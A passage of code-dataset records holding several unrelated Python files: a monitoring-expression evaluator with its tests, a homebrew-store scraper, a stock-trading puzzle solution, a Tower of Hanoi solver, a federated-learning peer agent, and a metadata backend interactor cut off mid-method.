So, for example, if each of the top level keys\n is a file name and the values are file properties, then it will evaluate the\n expression on the properties of every file in the object.\n\n If you need to evaluate this across all the elements of a sub-object named\n \"filenames\" in the top level \"data\" object then you give \"$filenames\" as the\n context argument, and your predicate as the expression like this:\n [\"$filenames\", \"\"].\n\n The code to do this is simpler than the explanation ;-)\n \"\"\"\n anynone = False\n if len(args) == 1:\n objectlist = context.objects\n else:\n objectlist = [GraphNodeExpression.evaluate(obj, context) for obj in args[:-1]]\n\n expressionstring = args[-1]\n if not isinstance(expressionstring, six.string_types):\n print(\n \"FOREACH expression must be a string, not %s\" % type(expressionstring), file=sys.stderr\n )\n return False\n # print('OBJECTLIST is:', objectlist, file=sys.stderr)\n for obj in objectlist:\n # print('OBJ is:', obj, file=sys.stderr)\n for key in obj:\n item = obj[key]\n if not hasattr(item, \"__contains__\") or not hasattr(item, \"__iter__\"):\n print(\"UNSUITABLE FOREACH CONTEXT[%s]: %s\" % (key, item), file=sys.stderr)\n continue\n # print(sys.stderr, 'CREATING CONTEXT[%s]: %s' % (key, item), file=sys.stderr)\n itemcontext = ExpressionContext(item)\n # print('CONTEXT IS:', itemcontext, file=sys.stderr)\n value = GraphNodeExpression.evaluate(expressionstring, itemcontext)\n # print('VALUE of %s IS [%s] in context: %s' % (str(args), value, item), file=sys.stderr)\n if value is None:\n anynone = True\n elif not value:\n return False\n return None if anynone else True\n\n\n@GraphNodeExpression.RegisterFun\ndef bitwiseOR(args, context):\n \"\"\"\n A function which evaluates the each expression and returns the bitwise OR of\n all the expressions given as arguments\n \"\"\"\n if len(args) < 2:\n return None\n result = 0\n for arg in args:\n value = GraphNodeExpression.evaluate(arg, context)\n if value is None:\n return None\n result |= int(value)\n return result\n\n\n@GraphNodeExpression.RegisterFun\ndef bitwiseAND(args, context):\n \"\"\"\n A function which evaluates the each expression and returns the bitwise AND of\n all the expressions given as arguments\n \"\"\"\n if len(args) < 2:\n return None\n result = int(args[0])\n for arg in args:\n value = GraphNodeExpression.evaluate(arg, context)\n if value is None:\n return None\n result &= int(value)\n return result\n\n\n@GraphNodeExpression.RegisterFun\ndef is_upstartjob(args, context):\n \"\"\"\n Returns \"true\" if any of its arguments names an upstart job, \"false\" otherwise\n If no arguments are given, it returns whether this system has upstart enabled.\n \"\"\"\n\n from monitoring import MonitoringRule\n\n agentcache = MonitoringRule.compute_available_agents(context)\n\n if \"upstart\" not in agentcache or len(agentcache[\"upstart\"]) == 0:\n return \"false\"\n\n for arg in args:\n value = GraphNodeExpression.evaluate(arg, context)\n if value in agentcache[\"upstart\"]:\n return \"true\"\n return len(args) == 0\n\n\ndef _regexmatch(key):\n \"\"\"Handy internal function to pull out the IP and port into a pyNetAddr\n Note that the format is the format used in the discovery information\n which in turn is the format used by netstat.\n This is not a \"standard\" format, but it's what netstat uses - so it's\n what we use.\n \"\"\"\n mobj = ipportregex.match(key)\n if mobj is None:\n return None\n (ip, port) = mobj.groups()\n ipport = pyNetAddr(ip, port=int(port))\n if 
ipport.isanyaddr():\n        if ipport.addrtype() == ADDR_FAMILY_IPV4:\n            ipport = pyNetAddr(\"127.0.0.1\", port=ipport.port())\n        else:\n            ipport = pyNetAddr(\"::1\", port=ipport.port())\n    return ipport\n\n\ndef _collect_ip_ports(service):\n    \"Collect our complete set of IP/Port combinations for this service\"\n    portlist = {}\n    for key in service.keys():\n        ipport = _regexmatch(key)\n        if ipport is None or ipport.port() == 0:\n            continue\n        port = ipport.port()\n        if port in portlist:\n            portlist[port].append(ipport)\n        else:\n            portlist[port] = [ipport]\n    return portlist\n\n\n# Netstat format IP:port pattern\nipportregex = re.compile(\"(.*):([^:]*)$\")\n\n\ndef selectanipport(arg, _context, preferlowestport=True, preferv4=True):\n    \"\"\"This function searches discovery information for a suitable IP\n    address/port combination to go with the service.\n    \"\"\"\n\n    # print('SELECTANIPPORT(%s)' % arg, file=sys.stderr)\n    try:\n\n        portlist = _collect_ip_ports(arg)\n        portkeys = list(portlist.keys())\n        if preferlowestport:\n            portkeys.sort()\n        for p in portlist[portkeys[0]]:\n            if preferv4:\n                if p.addrtype() == ADDR_FAMILY_IPV4:\n                    return p\n            else:\n                if p.addrtype() == ADDR_FAMILY_IPV6:\n                    return p\n        return portlist[portkeys[0]][0]\n    except (KeyError, ValueError, TypeError, IndexError):\n        # Something is hinky with this data\n        return None\n\n\n@GraphNodeExpression.RegisterFun\ndef serviceip(args, context):\n    \"\"\"\n    This function searches discovery information for a suitable concrete IP\n    address for a service.\n    The argument to this function tells it an expression that will give\n    it the hash table (map) of IP/port combinations for this service.\n    \"\"\"\n    if len(args) == 0:\n        args = (\"$procinfo.listenaddrs\",)\n    # print('SERVICEIP(%s)' % str(args), file=sys.stderr)\n    for arg in args:\n        nmap = GraphNodeExpression.evaluate(arg, context)\n        if nmap is None:\n            continue\n        # print('serviceip.SELECTANIPPORT(%s)' % (nmap), file=sys.stderr)\n        ipport = selectanipport(nmap, context)\n        if ipport is None:\n            continue\n        ipport.setport(0)  # Make sure return value doesn't include the port\n        # print('IPPORT(%s)' % str(ipport), file=sys.stderr)\n        return str(ipport)\n    return None\n\n\n@GraphNodeExpression.RegisterFun\ndef serviceport(args, context):\n    \"\"\"\n    This function searches discovery information for a suitable port for a service.\n    The argument to this function tells it an expression that will give\n    it the hash table (map) of IP/port combinations for this service.\n    \"\"\"\n    if len(args) == 0:\n        args = (\"$procinfo.listenaddrs\",)\n    # print('SERVICEPORT ARGS are %s' % (str(args)), file=sys.stderr)\n    for arg in args:\n        nmap = GraphNodeExpression.evaluate(arg, context)\n        if nmap is None:\n            continue\n        ipport = selectanipport(nmap, context)\n        if ipport is None:\n            continue\n        return str(ipport.port())\n    return None\n\n\n@GraphNodeExpression.RegisterFun\ndef serviceipport(args, context):\n    \"\"\"\n    This function searches discovery information for a suitable ip:port combination.\n    The argument to this function tells it an expression that will give\n    it the hash table (map) of IP/port combinations for this service.\n    The return value is a legal ip:port combination for the given\n    address type (ipv4 or ipv6)\n    \"\"\"\n    if len(args) == 0:\n        args = (\"$procinfo.listenaddrs\",)\n    for arg in args:\n        nmap = GraphNodeExpression.evaluate(arg, context)\n        if nmap is None:\n            continue\n        ipport = selectanipport(nmap, context)\n        if ipport is None:\n            continue\n        return str(ipport)\n    return None\n\n\n@GraphNodeExpression.RegisterFun\ndef basename(args, context):\n    \"\"\"\n
This function returns the basename from a pathname.\n If no pathname is supplied, then the executable name is assumed.\n \"\"\"\n if isinstance(args, six.string_types):\n args = (args,)\n if len(args) == 0:\n args = (\"$pathname\",) # Default to the name of the executable\n for arg in args:\n pathname = GraphNodeExpression.evaluate(arg, context)\n if pathname is None:\n continue\n # print('BASENAME(%s) => %s' % ( pathname, file=sys.stderr)\n # , os.path.basename(pathname))\n return os.path.basename(pathname)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef dirname(args, context):\n \"\"\"\n This function returns the directory name from a pathname.\n If no pathname is supplied, then the discovered service executable name is assumed.\n \"\"\"\n if isinstance(args, six.string_types):\n args = (args,)\n if len(args) == 0:\n args = (\"$pathname\",) # Default to the name of the executable\n for arg in args:\n pathname = GraphNodeExpression.evaluate(arg, context)\n if pathname is None:\n continue\n return os.path.dirname(pathname)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef hascmd(args, context):\n \"\"\"\n This function returns True if the given list of commands are all present on the given Drone.\n It determines this by looking at the value of $_init_commands.data\n \"\"\"\n cmdlist = GraphNodeExpression.evaluate(\"$_init_commands.data\", context)\n for arg in args:\n if cmdlist is None or arg not in cmdlist:\n return None\n return True\n\n\nif __name__ == \"__main__\":\n\n def simpletests():\n \"\"\"These tests don't require a real context\"\"\"\n assert NOT((True,), None) is False\n assert NOT((False,), None) is True\n assert EQ((1, 1, \"1\"), None) is True\n assert NOT(EQ((1,), None), None) is None\n assert MUST(NOT(EQ((1,), None), None), None) is False\n assert NONEOK(NOT(EQ((1,), None), None), None) is True\n assert NOT(EQ((1, 1, \"2\"), None), None) is True\n assert NOT(EQ((0, 0, \"2\"), None), None) is True\n assert EQ((\"a\", \"a\", \"a\"), None) is True\n assert EQ((\"0\", \"0\", 0), None) is True\n assert NOT(NE((1, 1, \"1\"), None), None) is True\n assert NOT(NE((1,), None), None) is None\n assert NONEOK(NOT(NE((1,), None), None), None) is True\n assert MUST(NOT(NE((1,), None), None), None) is False\n assert NOT(NE((1, 1, \"2\"), None), None) is True\n assert NOT(NE((0, 0, \"2\"), None), None) is True\n assert NOT(NE((\"a\", \"a\", \"a\"), None), None) is True\n assert NOT(NE((\"0\", \"0\", 0), None), None) is True\n assert LE((1, 1), None) is True\n assert LE((1, 5), None) is True\n assert NOT(LT((1, 1), None), None) is True\n assert LT((1, 5), None) is True\n assert NOT(GT((1, 1), None), None) is True\n assert GE((1, 1), None) is True\n assert IN((1, 2, 3, 4, 1), None) is True\n assert IN((1, 2, 3, 4, \"1\"), None) is True\n assert NOT(IN((1, 2, 3, 4), None), None) is True\n assert NOT(NOTIN((1, 2, 3, 4, 1), None), None) is True\n assert NOT(NOTIN((1, 2, 3, 4, \"1\"), None), None) is True\n assert NOTIN((1, 2, 3, 4), None) is True\n assert bitwiseOR((1, 2, 4), None) == 7\n assert bitwiseOR((1, 2, \"4\"), None) == 7\n assert bitwiseAND((7, 3), None) == 3\n assert bitwiseAND((7, 1, \"2\"), None) == 0\n assert bitwiseAND((\"15\", \"7\", \"3\"), None) == 3\n assert IGNORE((False, False, False), None)\n assert MUST(None, None) is False\n assert MUST(True, None) is True\n assert MUST(False, None) is False\n assert NONEOK(None, None) is True\n assert NONEOK(True, None) is True\n assert NONEOK(False, None) is False\n assert match((\"fred\", \"fre\"), None)\n assert 
match((\"fred\", \"FRE\"), None) is False\n assert match((\"fred\", \"FRE\", \"I\"), None) is True\n assert basename((\"/dev/null\"), None) == \"null\"\n assert dirname((\"/dev/null\"), None) == \"/dev\"\n print(\"Simple tests passed.\", file=sys.stderr)\n\n def contexttests():\n \"GraphNodeExpression tests that need a context\"\n\n lsattrs = \"\"\"{\n \"/var/log/audit/\": {\"owner\": \"root\", \"group\": \"root\", \"type\": \"d\", \"perms\": {\"owner\":{\"read\":true, \"write\":true, \"exec\":true, \"setid\":false}, \"group\": {\"read\":true, \"write\":false, \"exec\":true, \"setid\":false}, \"other\": {\"read\":false, \"write\":false, \"exec\":false}, \"sticky\":false}, \"octal\": \"0750\"},\n \"/var/log/audit/audit.log\": {\"owner\": \"root\", \"group\": \"root\", \"type\": \"-\", \"perms\": {\"owner\":{\"read\":true, \"write\":true, \"exec\":false, \"setid\":false}, \"group\": {\"read\":false, \"write\":false, \"exec\":false, \"setid\":false}, \"other\": {\"read\":false, \"write\":false, \"exec\":false}, \"sticky\":false}, \"octal\": \"0600\"},\n \"/var/log/audit/audit.log.1\": {\"owner\": \"root\", \"group\": \"root\", \"type\": \"-\", \"perms\": {\"owner\":{\"read\":true, \"write\":false, \"exec\":false, \"setid\":false}, \"group\": {\"read\":false, \"write\":false, \"exec\":false, \"setid\":false}, \"other\": {\"read\":false, \"write\":false, \"exec\":false}, \"sticky\":false}, \"octal\": \"0400\"}\n}\"\"\"\n lscontext = ExpressionContext(pyConfigContext(lsattrs))\n\n Pie_context = ExpressionContext(\n (\n pyConfigContext(\n {\n \"a\": {\"b\": \"c\", \"pie\": 3, \"pi\": 3, \"const\": \"constant\"},\n \"f\": {\"g\": \"h\", \"pie\": \"3\", \"pi\": 3, \"const\": \"constant\"},\n }\n ),\n pyConfigContext({\"math\": {\"pi\": 3.14159, \"pie\": 3, \"const\": \"constant\"}}),\n pyConfigContext({\"geography\": {\"Europe\": \"big\", \"const\": \"constant\"}}),\n )\n )\n complicated_context = ExpressionContext(pyConfigContext({\"a\": {\"b\": {\"pie\": 3}}}))\n argcontext = ExpressionContext(\n pyConfigContext('{\"argv\": [\"command-name-suffix\", \"thing-one\", \"thang-two\"]}')\n )\n\n assert FOREACH((\"EQ(False, $perms.group.write, $perms.other.write)\",), lscontext) is True\n assert FOREACH((\"EQ($pi, 3)\",), Pie_context) is False\n assert FOREACH((\"EQ($pie, 3)\",), Pie_context) is None\n assert FOREACH((\"$a\", \"EQ($pie, 3)\"), complicated_context) is True\n assert FOREACH((\"$a\", \"EQ($pie, 3.14159)\"), complicated_context) is False\n assert FOREACH((\"$a\", \"EQ($pi, 3.14159)\"), complicated_context) is None\n assert FOREACH((\"EQ($const, constant)\",), Pie_context) is True\n assert GraphNodeExpression.evaluate(\"EQ($math.pie, 3)\", Pie_context) is True\n assert FOREACH((\"EQ($group, root)\",), lscontext) is True\n assert FOREACH((\"EQ($owner, root)\",), lscontext) is True\n assert FOREACH((\"AND(EQ($owner, root), EQ($group, root))\",), lscontext) is True\n assert argmatch((\"thing-(.*)\",), argcontext) == \"one\"\n assert argmatch((\"THING-(.*)\", \"$argv\", \"I\"), argcontext) == \"one\"\n assert argmatch((\"thang-(.*)\",), argcontext) == \"two\"\n assert argmatch((\"THANG-(.*)\", \"$argv\", \"I\"), argcontext) == \"two\"\n assert argmatch((\"thang-.*\",), argcontext) == \"thang-two\"\n assert argmatch((\"THANG-.*\", \"$argv\", \"I\"), argcontext) == \"thang-two\"\n print(\"Context tests passed.\", file=sys.stderr)\n\n simpletests()\n contexttests()\n print(\"All tests passed.\", 
file=sys.stderr)\n","repo_name":"assimilation/assimilation-official","sub_path":"cma/graphnodeexpression.py","file_name":"graphnodeexpression.py","file_ext":"py","file_size_in_byte":48328,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"18"} +{"seq_id":"31521326122","text":"from bs4 import BeautifulSoup\nimport requests\nimport os\nfrom selenium import webdriver\nimport time\n\n\nclass leagueofbrewers():\n \"\"\"\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n\n :param self:\n :return:\n \"\"\"\n self.BASE_URL = 'https://leagueofbrewers.co.nz/homebrew-beer-supplies/beer-brewing-ingredients/'\n self.grain_url = 'malt-for-making-beer/grain-for-brewing?limit=25'\n self.liquid_yeast_url = 'beer-brewing-yeast/liquid-yeast-for-beer?limit=25'\n self.dry_yeast = 'beer-brewing-yeast/dry-yeast-for-beer?limit=25'\n self.hops_url = 'hops-for-brewing-beer?limit=25'\n # self.all_urls = [self.hops_url, self.grain_url, self.dry_yeast, self.liquid_yeast_url]\n self.all_urls = [self.liquid_yeast_url]\n self.s = requests.session()\n return\n\n def update_products(self):\n \"\"\"\n go through all types of products and update the database\n :return:\n \"\"\"\n for product_url in self.all_urls:\n entire_page = self._load_entire_page(self.BASE_URL+product_url)\n details = self._update_single_product(entire_page)\n self._store(details)\n return\n\n def _load_entire_page(self, url):\n \"\"\"\n Use selenium driver to load chrome, scroll then pass resultant html.\n :return:\n \"\"\"\n options = webdriver.ChromeOptions()\n options.add_argument('headless')\n options.add_argument('chromedriver')\n driver = webdriver.Chrome(options=options)\n driver.get(url)\n ScrollNumber = 20\n for i in range(1, ScrollNumber):\n driver.execute_script(\"window.scrollTo(1,50000)\")\n time.sleep(1)\n return driver.page_source\n\n def _parseurl(self, url, sub='get', payload=''):\n if sub == 'get':\n r = self.s.get(url, verify=False)\n else:\n r = self.s.post(url, data=payload, verify=False)\n return r\n\n def _update_single_product(self, html):\n \"\"\"\n works for malt, yeast and hops. 
doesn't load the whole page, however; need to work out how to handle JS loading the whole page\n\n        :param product_url: 'beer-brewing-yeast'\n        :return:\n        \"\"\"\n        product_details = []\n        soup = BeautifulSoup(html, features=\"html.parser\")\n        for product in soup.findAll(class_='product-image'):\n            product_name = product.img['alt']\n            product_price = product.find(class_='price').text\n            product_link = product.a['href']\n            if product.find(class_='backorder'):\n                product_availability = 0\n            else:\n                product_availability = 1\n            product_details.append((product_name, product_price, product_link, product_availability))\n        return product_details\n\n    def _store(self, deets_array):\n        \"\"\"\n        Store the details of the items\n        :return:\n        \"\"\"\n        for a in deets_array:\n            for b in a:\n                print(b)\n        print(len(deets_array))\n\n\nif __name__ == '__main__':\n    t = leagueofbrewers()\n    t.update_products()\n","repo_name":"wookienz/homebrewstore","sub_path":"classes/leagueofbrewers.py","file_name":"leagueofbrewers.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"28963843763","text":"import sys\n\n\n# leet code test\ndef find(arr, fee, sA=0):\n    if len(arr) == 0: return 0\n    bA = -arr[0]\n    for i in arr[1:]:\n        nBA = max(bA, sA - i)\n        nSA = max(sA, bA + i - fee)\n        bA = nBA\n        sA = nSA\n    return sA\n\n\n# result=13\nfee = 3\ninput = [0, 5, 7, 10, 6, 8, 12, 10, 12, 10, 13, 15]\n# result=6\nfee = 3\ninput = [1, 3, 7, 5, 10, 3]\n# result=8\nfee = 2\ninput = [1, 3, 2, 8, 4, 9]\n# result=0\nfee = 3\ninput = [9, 8, 7, 1, 2]\n# result=0\nfee = 0\ninput = [1]\n# result=4\nfee = 1\ninput = [2, 1, 4, 4, 2, 3, 2, 5, 1, 2]\nprint(find(input, fee))\n","repo_name":"PalampurRockstar/Algorithm","sub_path":"src/main/python/algo/medium/BuyAndSellStockInfiniteTransactionEachWithFee.py","file_name":"BuyAndSellStockInfiniteTransactionEachWithFee.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"74650609320","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ndef move(n, a, b, c):\n\tprint(\"move({0},{1},{2},{3})\".format(n,a,b,c))\n\tif n == 1:\n\t\tprint(\"move from {0} to {1}\".format(a,c))\n\telse:\n\t\tmove(n-1, a, c, b) # move the top n-1 disks from a to b, using c\n\t\tmove(1, a, b, c)\n\t\tmove(n-1, b, a, c)\n\nif __name__ == '__main__': \n\tmove(3, 'A', 'B', 'C')","repo_name":"leeliang/python-learning","sub_path":"code/00_Hanoi.py","file_name":"00_Hanoi.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"15282632880","text":"from p2p.agents.sync_agent import *\nfrom models.abstract_model import weights_average\nimport numpy as np\n\n# Decentralized federated learning of deep neural networks on non-iid data\n# Authors: Onoszko, Noa\n# Karlsson, Gustav\n# Mogren, Olof\n# Zec, Edvin Listo\n\n\nclass PensAgent(SyncAgent):\n    def __init__(self, rounds=100, n_sampled=6, top_m=3, n_peers=3, fixed_comm=False, **kwargs):\n        super(PensAgent, self).__init__(**kwargs)\n        self.rounds = rounds\n        self.n_sampled = n_sampled\n        self.top_m = top_m\n        self.n_peers = n_peers\n        self.fixed_comm = fixed_comm\n        self.iteration = 0\n        self.selected_peers = {}\n        self.new_weights = None\n\n    def train_fn(self):\n        if self.new_weights is not None:\n            self.set_model_weights(self.new_weights)\n            self.new_weights = None\n        self.iteration += 1\n        return super(PensAgent, self).train_fn()\n\n    def pull_from_peers(self):\n        if
self.iteration < self.rounds:\n p = np.arange(self.graph.nodes_num)\n p = p[p != self.id]\n indx = np.random.choice(p, self.n_sampled, replace=False)\n peers = [p for p in self.graph.nodes if p.id in indx]\n # peers = np.random.choice(list(set(self.graph.nodes) - {self}), self.n_sampled, replace=False)\n else:\n expected_samples = (self.top_m / self.graph.nodes_num) * self.rounds\n peers = [k for k, v in self.selected_peers.items() if v > expected_samples]\n indx = np.random.choice(np.array([p.id for p in peers]), self.n_peers, replace=False)\n peers = [p for p in peers if p.id in indx]\n # peers = np.random.choice(peers, size=self.n_peers, replace=False)\n if self.fixed_comm:\n graph_peers = self.graph.get_peers(self.id)\n # If the comm matrix is built, use that peers in fixed communication\n if len(graph_peers) != 0:\n peers = graph_peers\n for peer in peers:\n super(PensAgent, self).receive_message(peer)\n\n if self.iteration < self.rounds:\n saved_models = {self.eval_model_loss(p.model, self.train): p for p in peers}\n peers = list(dict(sorted(saved_models.items())).values())[:self.top_m]\n for peer in peers:\n # We want to receive more messages from this peer so mark as selected peer\n if peer not in self.selected_peers:\n self.selected_peers[peer] = 0\n self.selected_peers[peer] += 1\n\n alphas = [self.train_len] + [peer.train_len for peer in peers]\n ws = [self.get_model_weights()] + [peer.get_model_weights() for peer in peers]\n self.new_weights = weights_average(ws, alphas)\n\n self.hist['selected_peers'] = {p.id: v for p, v in self.selected_peers.items()}\n\n def sync_parameters(self):\n self.pull_from_peers()\n\n def update_parameters(self):\n pass\n","repo_name":"rosaj/p2p_sgd","sub_path":"p2p/agents/pens_agent.py","file_name":"pens_agent.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6232574327","text":"import logging\nfrom abc import abstractmethod\nfrom datetime import datetime\n\nimport gevent\nfrom about_time import about_time\nfrom cached_property import threaded_cached_property\nfrom gevent import Timeout, joinall, killall\n\nfrom metadata.backend.interface import BackendType\nfrom metadata.exc import InteractTimeOut, NotImplementedByBackendError\nfrom metadata.interactor.core import TransactionalOperations\nfrom metadata.interactor.orchestrate import (\n BatchDGraphOrchestrator,\n BatchMySQLReplicaOrchestrator,\n MySQLReplicaOrchestrator,\n SingleDGraphOrchestrator,\n)\nfrom metadata.interactor.record import LocalRecordsPersistence\nfrom metadata.interactor.transcation import TransactionalDispatchMixIn\nfrom metadata.runtime import rt_context, rt_local, rt_local_manager\nfrom metadata.util.common import StrictABCMeta\nfrom metadata.util.context import inherit_local_ctx\nfrom metadata.util.i18n import selfish as _\n\n\nclass Interactor(object, metaclass=StrictABCMeta):\n __abstract__ = True\n\n def __init__(self, backends_in_use, timeout_sec=None, if_recording=True):\n self.backends_in_use = backends_in_use\n self.config_collection = rt_context.config_collection\n self.timeout_sec = (\n self.config_collection.interactor_config.INTERACTOR_TIMEOUT if not timeout_sec else self.timeout_sec\n )\n self.son_timeout_sec = self.timeout_sec - 5 if self.timeout_sec > 10 else self.timeout_sec\n self.if_recording = if_recording\n self.local_persistence = LocalRecordsPersistence()\n self.transactional_operations = None\n self.operate_records = None\n self.batch = False\n 
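The `pull_from_peers` method above finishes by blending the local model with the selected peers' models through `weights_average`, weighted by each node's `train_len`. A minimal sketch of that kind of sample-size-weighted averaging, assuming each model is just a list of per-layer numpy arrays (the real `weights_average` in `models.abstract_model` may differ in detail):

```python
import numpy as np

def weighted_average(weight_lists, alphas):
    # Normalize the per-node sample counts into mixing coefficients.
    alphas = np.asarray(alphas, dtype=float)
    alphas = alphas / alphas.sum()
    # Average each layer across nodes, weighted by its node's coefficient.
    return [
        sum(a * layer for a, layer in zip(alphas, layers))
        for layers in zip(*weight_lists)
    ]

# Two toy "models", each a list of per-layer arrays.
node_a = [np.ones((2, 2)), np.zeros(3)]
node_b = [np.zeros((2, 2)), np.ones(3)]

# Node A trained on 300 samples, node B on 100.
avg = weighted_average([node_a, node_b], alphas=[300, 100])
print(avg[0])  # every entry 0.75 = (300/400) * 1 + (100/400) * 0
```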
self.transaction_count = 0\n\n self.logger = logging.getLogger(self.__module__ + '.' + self.__class__.__name__)\n\n @threaded_cached_property\n def sessions(self):\n \"\"\"\n The various sessions used by the Interactor.\n\n \"\"\"\n sessions = {}\n if self.backends_in_use.get(BackendType.MYSQL, False):\n sessions[BackendType.MYSQL] = rt_context.mysql_backend.operate_session().session\n if self.backends_in_use.get(BackendType.DGRAPH, False):\n sessions[BackendType.DGRAPH] = rt_context.dgraph_backend.operate_session()\n if self.backends_in_use.get(BackendType.DGRAPH_BACKUP, False):\n sessions[BackendType.DGRAPH_BACKUP] = rt_context.dgraph_backup_backend.operate_session()\n if self.backends_in_use.get(BackendType.DGRAPH_COLD, False):\n sessions[BackendType.DGRAPH_COLD] = rt_context.dgraph_cold_backend.operate_session()\n db_name = self.backends_in_use.get(BackendType.CONFIG_DB, None)\n if db_name:\n sessions[BackendType.CONFIG_DB] = rt_context.biz_mysql_backends[db_name].operate_session().session\n return sessions\n\n @abstractmethod\n def dispatch(self, *args, **kwargs):\n \"\"\"\n Perform one complete interaction with the backends.\n\n \"\"\"\n pass\n\n @abstractmethod\n def invoke(self, *args, **kwargs):\n \"\"\"\n Execute data operations; may be called multiple times before commit.\n\n \"\"\"\n\n def apply(self, *args, **kwargs):\n \"\"\"\n Commit the operation changes.\n\n \"\"\"\n self.renew_at_apply_prepare()\n ret = self.basic_apply()\n self.renew_at_applied()\n return ret\n\n @abstractmethod\n def basic_apply(self, *args, **kwargs):\n \"\"\"\n The core commit operation for changes.\n\n \"\"\"\n pass\n\n def setup_transactional_operations(self):\n dispatch_id = getattr(rt_context, 'dispatch_id', None)\n if dispatch_id:\n for record in self.operate_records:\n if not record.operate_id:\n record.operate_id = dispatch_id\n self.transactional_operations = TransactionalOperations(\n operations=self.operate_records, operate_id=dispatch_id\n )\n else:\n self.transactional_operations = TransactionalOperations(operations=self.operate_records)\n\n def renew_at_apply_prepare(self):\n check_dict = {}\n self.logger.info('Transaction with ID {} is preparing to apply.'.format(self.transaction_count))\n for item in self.operate_records:\n item.transaction_id = self.transaction_count\n item_dict = {\n name: getattr(item, name)\n for name in dir(item)\n if not name.startswith('__') and not callable(getattr(item, name))\n }\n mysql_table_name = item_dict.get('extra_', {}).get('mysql_table_name', None)\n if mysql_table_name:\n if mysql_table_name not in check_dict:\n check_dict[mysql_table_name] = []\n check_dict[mysql_table_name].append(item_dict)\n try:\n if not self.check_data_legality(check_dict):\n self.logger.exception('[check_lineage] Data sync is illegal: {}'.format(check_dict))\n except Exception as err:\n self.logger.exception('[check_lineage] check lineage raised an error: {}'.format(err))\n self.transactional_operations.transaction_id = self.transaction_count\n self.transactional_operations.state = 'ApplyPrepare'\n self.local_persistence.save(self.transactional_operations) if self.if_recording else None\n\n def renew_at_applied(self):\n self.logger.info('Transaction with ID {} is applied.'.format(self.transaction_count))\n self.transactional_operations.apply_time = datetime.now()\n self.transactional_operations.state = 'Applied'\n self.local_persistence.save(self.transactional_operations) if self.if_recording else None\n\n def check_data_legality(self, check_dict):\n \"\"\"\n Check the legality of the data being synced.\n check rules list:\n 1. Monitor data_processing_relation writes and verify lineage integrity.\n \"\"\"\n if 'data_processing_relation' in check_dict and self.backends_in_use.get(BackendType.DGRAPH,
 False):\n return rt_context.dgraph_backend.check_lineage_integrity(\n check_dict['data_processing_relation'], self.sessions[BackendType.DGRAPH]\n )\n return True\n\n\nclass SingleInteractor(TransactionalDispatchMixIn, Interactor):\n \"\"\"\n An Interactor used with a single backend only.\n \"\"\"\n\n backup_backend_support = True\n\n def __init__(self, backend_type, *args, **kwargs):\n if backend_type is BackendType.MYSQL:\n raise NotImplementedByBackendError(_('Edit function is not enabled in MySQL backend.'))\n self.backend_type = backend_type\n super(SingleInteractor, self).__init__(backends_in_use={self.backend_type: True}, *args, **kwargs)\n self.backend_session = self.sessions[self.backend_type]\n\n def dispatch(self, operate_records, batch=False):\n self.operate_records = operate_records\n self.batch = batch\n self.setup_transactional_operations()\n self.local_persistence.save(self.transactional_operations)\n with Timeout(self.timeout_sec, InteractTimeOut(_('dispatch timeout in {}.').format(self.timeout_sec))):\n with self.backend_session:\n self.transactional_inner_dispatch()\n\n def invoke(self):\n setattr(rt_local, '{}_session_now'.format(self.backend_type.raw.value), self.backend_session)\n b = (\n BatchDGraphOrchestrator(backend_session=self.backend_session)\n if self.batch\n else SingleDGraphOrchestrator(backend_session=self.backend_session)\n )\n b.dispatch(self.operate_records)\n\n def basic_apply(self):\n ret = self.backend_session.commit()\n del self.sessions\n return ret\n\n\nclass ParallelInteractor(TransactionalDispatchMixIn, Interactor):\n \"\"\"\n An Interactor that dispatches to multiple backends concurrently.\n \"\"\"\n\n backup_backend_support = False\n\n def __init__(self, *args, **kwargs):\n super(ParallelInteractor, self).__init__(*args, **kwargs)\n self.available_backends = self.backends_in_use\n self.metric_store = {}\n self.mysql_gl, self.dgraph_gl, self.config_db_gl = None, None, None\n self.invoking_greenlets = []\n self.record_keys_lst = None\n\n def dispatch(self, operate_records, batch):\n self.operate_records = operate_records\n self.batch = batch\n self.setup_transactional_operations()\n self.local_persistence.save(self.transactional_operations)\n self.record_keys_lst = [item.operate_id if item.operate_id else item for item in operate_records]\n with Timeout(self.timeout_sec, InteractTimeOut(_('dispatch timeout in {}.').format(self.timeout_sec))):\n try:\n # For every enabled backend, hold a transaction and perform the data interaction\n for k, v in list(self.sessions.items()):\n v.__enter__()\n self.transactional_inner_dispatch()\n finally:\n # In any case, the child sync greenlets must be terminated by the time this call completes.\n killall(self.invoking_greenlets)\n for k, v in list(self.sessions.items()):\n v.__exit__(None, None, None)\n\n def invoke(self):\n self.invoking_greenlets = []\n if self.available_backends.get(BackendType.CONFIG_DB):\n g = gevent.spawn(inherit_local_ctx(self.renew_config_db, rt_local, rt_local_manager))\n self.invoking_greenlets.append(g)\n if self.available_backends.get(BackendType.MYSQL):\n g = gevent.spawn(inherit_local_ctx(self.interact_with_mysql, rt_local, rt_local_manager))\n self.invoking_greenlets.append(g)\n if self.available_backends.get(BackendType.DGRAPH):\n g = gevent.spawn(inherit_local_ctx(self.interact_with_dgraph, rt_local, rt_local_manager))\n self.invoking_greenlets.append(g)\n joinall(self.invoking_greenlets, raise_error=False)\n for item in self.invoking_greenlets:\n if not item.successful():\n item._raise_exception()\n\n def basic_apply(self):\n self.logger.info('sessions_this_time is {}'.format(self.sessions))\n if self.available_backends.get(BackendType.DGRAPH):\n with
